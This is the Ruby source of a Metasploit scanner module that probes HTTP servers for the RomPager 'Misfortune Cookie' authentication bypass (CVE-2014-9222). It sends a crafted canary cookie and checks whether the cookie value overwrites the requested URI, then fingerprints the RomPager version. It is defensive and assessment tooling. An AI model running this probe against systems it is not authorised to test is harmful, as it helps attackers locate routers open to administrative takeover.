Allegro Software RomPager Misfortune Cookie (CVE-2014-9222) Scanner

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::Report  
  
def initialize(info = {})  
super(update_info(  
info,  
'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Scanner",  
'Description' => %q(  
This module scans for HTTP servers that appear to be vulnerable to the  
'Misfortune Cookie' vulnerability which affects Allegro Software  
Rompager versions before 4.34 and can allow attackers to authenticate  
to the HTTP service as an administrator without providing valid  
credentials.  
),  
'Author' => [  
'Jon Hart <jon_hart[at]rapid7.com>', # metasploit module  
'Lior Oppenheim' # CVE-2014-9222  
],  
'References' => [  
['CVE', '2014-9222'],  
['URL', 'http://mis.fortunecook.ie'],  
['URL', 'http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf'], # list of likely vulnerable devices  
['URL', 'http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf'] # 31C3 presentation with POC  
],  
'DisclosureDate' => '2014-12-17',  
'License' => MSF_LICENSE  
))  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'URI to test', '/'])  
], Exploit::Remote::HttpClient  
)  
  
register_advanced_options(  
[  
OptString.new('CANARY_URI', [false, 'Try overwriting the requested URI with this canary value (empty for random)']),  
OptString.new('STATUS_CODES_REGEX', [true, 'Ensure that canary pages and probe responses have status codes that match this regex', '^40[134]$'])  
], self.class  
)  
end  
  
def check_host(_ip)  
begin  
test_misfortune  
ensure  
disconnect  
end  
end  
  
def run_host(ip)  
status = check_host(ip)  
case status  
when Exploit::CheckCode::Appears  
when Exploit::CheckCode::Detected  
when Exploit::CheckCode::Vulnerable  
print_good("#{peer} #{status.last}")  
else  
vprint_status("#{peer} #{status.last}")  
end  
end  
  
def setup  
@status_codes_regex = Regexp.new(datastore['STATUS_CODES_REGEX'])  
end  
  
# Fingerprints the provided HTTP response and returns  
# Exploit::CheckCode::Appears if it is a vulnerable version of RomPager,  
# otherwise returns the provided fall-back status.  
def check_response_fingerprint(res, fallback_status)  
fp = http_fingerprint(response: res)  
if /RomPager\/(?<version>[\d\.]+)/ =~ fp  
vprint_status("#{peer} is RomPager #{version}")  
if Rex::Version.new(version) < Rex::Version.new('4.34')  
return Exploit::CheckCode::Appears  
end  
end  
fallback_status  
end  
  
def find_canary  
vprint_status("#{peer} locating suitable canary URI")  
canaries = []  
if datastore['CANARY_URI']  
canaries << datastore['CANARY_URI']  
else  
# several random URIs in the hopes that one, generally the first, will be usable  
0.upto(4) { canaries << '/' + Rex::Text.rand_text_alpha(16) }  
end  
  
canaries.each do |canary|  
res = send_request_raw(  
'uri' => normalize_uri(canary),  
'method' => 'GET',  
'headers' => headers  
)  
# in most cases, the canary URI will not exist and will return a 404, but  
# if everything under TARGETURI is protected by auth, a 401 may be OK too.  
# but, regardless, respect the configuration set for this module  
return [canary, res.code] if res && res.code.to_s =~ @status_codes_regex  
end  
nil  
end  
  
def headers  
{  
'Referer' => full_uri  
}  
end  
  
# To test for this vulnerability, we must first find a URI known to return  
# a 404 (not found) which we will use as a canary. This URI (for example,  
# /foo) is then taken and used as the value for a carefully crafted cookie  
# when making a request to the configured host+port+uri. If the response  
# is a 404 and the body includes the canary, it is likely that the cookie  
# overwrote RomPager's concept of the requested URI, indicating that it is  
# vulnerable.  
def test_misfortune  
# find a usable canary URI (one that returns an acceptable status code already)  
if canary = find_canary  
canary_value, canary_code = canary  
vprint_status("#{peer} found canary URI #{canary_value} with code #{canary_code}")  
else  
vprint_error("#{peer} Unable to find a suitable canary URI")  
return Exploit::CheckCode::Unknown  
end  
  
canary_cookie_name = 'C107373883'  
canary_cookie = canary_cookie_name + "=#{canary_value};"  
  
# Make a request containing a specific canary cookie name with the value set  
# from the suitable canary value found above.  
res = send_request_raw(  
'uri' => normalize_uri(target_uri.path.to_s),  
'method' => 'GET',  
'headers' => headers.merge('Cookie' => canary_cookie)  
)  
  
unless res  
vprint_error("#{full_uri} no response")  
return Exploit::CheckCode::Unknown  
end  
  
unless res.code.to_s =~ @status_codes_regex  
vprint_status("#{full_uri} unexpected HTTP code #{res.code} response")  
return check_response_fingerprint(res, Exploit::CheckCode::Detected)  
end  
  
unless res.body  
vprint_status("#{full_uri} HTTP code #{res.code} had no body")  
return check_response_fingerprint(res, Exploit::CheckCode::Detected)  
end  
  
# If that canary *value* shows up in the *body*, then there are two possibilities:  
#  
# 1) If the canary cookie *name* is also in the *body*, it is likely that  
# the endpoint is puppeting back our request to some extent and therefore  
# it is expected that the canary cookie *value* would also be there.  
# return Exploit::CheckCode::Detected  
#  
# 2) If the canary cookie *name* is *not* in the *body*, return  
# Exploit::CheckCode::Vulnerable  
if res.body.include?(canary_value)  
if res.body.include?(canary_cookie_name)  
vprint_status("#{full_uri} HTTP code #{res.code} response contained canary cookie name #{canary_cookie_name}")  
return check_response_fingerprint(res, Exploit::CheckCode::Detected)  
else  
vprint_good("#{full_uri} HTTP code #{res.code} response contained canary cookie value #{canary_value} as URI")  
report_vuln(  
host: rhost,  
port: rport,  
name: name,  
refs: references  
)  
return Exploit::CheckCode::Vulnerable  
end  
end  
  
vprint_status("#{full_uri} HTTP code #{res.code} response did not contain canary cookie value #{canary_value} as URI")  
check_response_fingerprint(res, Exploit::CheckCode::Safe)  
end  
end  
`